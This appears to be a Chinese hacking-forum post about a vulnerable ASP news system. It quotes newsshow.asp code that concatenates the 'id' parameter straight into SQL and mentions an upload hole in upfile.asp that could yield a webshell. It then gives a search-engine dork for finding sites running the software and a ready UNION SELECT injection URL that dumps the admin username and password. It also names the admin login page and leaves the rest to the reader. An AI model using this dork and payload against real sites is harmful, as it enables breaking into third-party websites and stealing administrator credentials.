![Rank: 15](images/default/star_level3.gif) ![Rank: 15](images/default/star_level3.gif) ![Rank: 15](images/default/star_level3.gif) ![Rank: 15](images/default/star_level2.gif) ![Rank: 15](images/default/star_level1.gif)
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
![管理组 管理组](images/common/medal1.gif) ![高手勋章 高手勋章](images/common/medal2.gif) ![核心成员 核心成员](images/common/medal4.gif) ![原创奖章 原创奖章](images/common/medal5.gif) ![帅哥勋章 帅哥勋章](images/common/medal9.gif) ![突出贡献奖 突出贡献奖](images/common/2.gif) ![优质人品奖章 优质人品奖章](images/common/6.gif) ![论坛元老 论坛元老](images/common/7.gif) ![管理组成员 管理组成员](images/common/8.gif) ![技术组成员 技术组成员](images/common/9.gif)
|
程序代码- 核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...
复制代码 漏洞文件:newsshow.asp
漏洞代码:
程序代码- <%
- set rs=server.createobject("adodb.recordset")
- sql="update news set hit=hit+1 where ID="&request("id")
- rs.open sql,conn,1,3
- %>
- <%
- set rs=server.CreateObject("adodb.recordset")
- sql="select * from news where ID="&request("id")
- rs.open sql,conn
- %>
复制代码 只分析了这一个,
任意上传漏洞:upfile.asp
有兴趣的可以分析下利用上传拿WEBSHELL
搜索关键词:inurl:baodianlist.asp+信息中心
然后输入- http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin
复制代码 爆出管理帐号密码
后台登陆地址:admin.asp
剩下的自己搞吧! |
|